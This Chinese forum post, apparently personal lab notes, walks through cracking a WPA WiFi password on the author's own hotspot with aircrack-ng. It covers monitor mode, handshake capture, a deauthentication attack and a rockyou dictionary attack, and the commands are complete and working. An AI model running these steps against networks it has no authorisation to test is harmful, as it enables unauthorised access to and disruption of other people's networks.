WiFi无线攻防-破解密码小实例笔记

zhaorong · 发表于无线技术教程 2021-8-3 14:55:04


	本帖最后由 zhaorong 于 2021-8-3 14:56 编辑无线网络是指无需布线就能实现各种通信设备互联的网络。无线网络技术涵盖的范围很广，既包括允许用户建立远距离无线连接的全球语音和数据网络，也包括为近距离无线连接进行优化的红外线及射频技术。根据网络覆盖范围的不同可以将无线网络划分为无线广域网 WWAN：Wireless Wide Area Network 无线局域网(WLAN：Wireless Local Area Network 无线城域网(WMAN：Wireless Metropolitan Area Network)和无线个人局域网(WPAN：Wireless Personal Area Network。准备阶段-插入网卡后选择添加到虚拟机，iwconfig可以看到多出一个wlan 0网卡；激活网卡 airmon-ng start wlan0 复制代码这个时候iwconfig可以看见已经激活探测阶段-利用网卡搜索周围能获取到WiFi的信息这里以及下面的所有抓包阶段都是按两次q退出不要强制退出。 airodump-ng wlan0mon 复制代码抓包阶段-利用airodump 这里选择了我的热点这里需要注意的是我们设置保存的文件名是zcc 但是生成的文件却不是zcc.ivs而是zcc-01.ivs。 airodump-ng --ivs --bssid D6:D0:40:0B:72:7E -w zcc -c 8 wlan0mon 复制代码其中2C:DB:07:84:9A:6D是我的本机，他链接到了D6:D0:40:0B:72:7E这个网络内。这里也可以抓取CAP包可以看见他生成了好几个文件，其中有CAP包： airodump-ng -c 8 -w /root/Desktop/ --bssid D6:D0:40:0B:72:7E wlan0mon 复制代码攻击阶段-aireplay（谨记：开新窗口运行）此处需要新开一个shell aireplay-ng -0 1 -a D6:D0:40:0B:72:7E -c 2C:DB:07:84:9A:6D wlan0mon 复制代码当出现WPA handshake:D6:D0:40:0B:72:7E时说明抓包完成获取到了wifi包的加密秘钥前提条件是有机子连接这个wifi；收集阶段-字典攻击CAP（字典收集）（1）使用kali自带密钥字典： • cd /usr/share/wordlists/ • gzip -d rockyou.txt.gz 复制代码（2）导入本地的密码本破解阶段-aircrack破解（1）ivs数据包爆破 aircrack-ng -w password.txt zcc-01.ivs 复制代码 KEY FOUND！后面中括号中就是WiFi密码。（2）破解cap包情况 aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/Desktop/-01.cap 复制代码成功破解！

微信扫一扫 分享朋友圈

WiFi无线攻防-破解密码小实例笔记

微信扫一扫分享朋友圈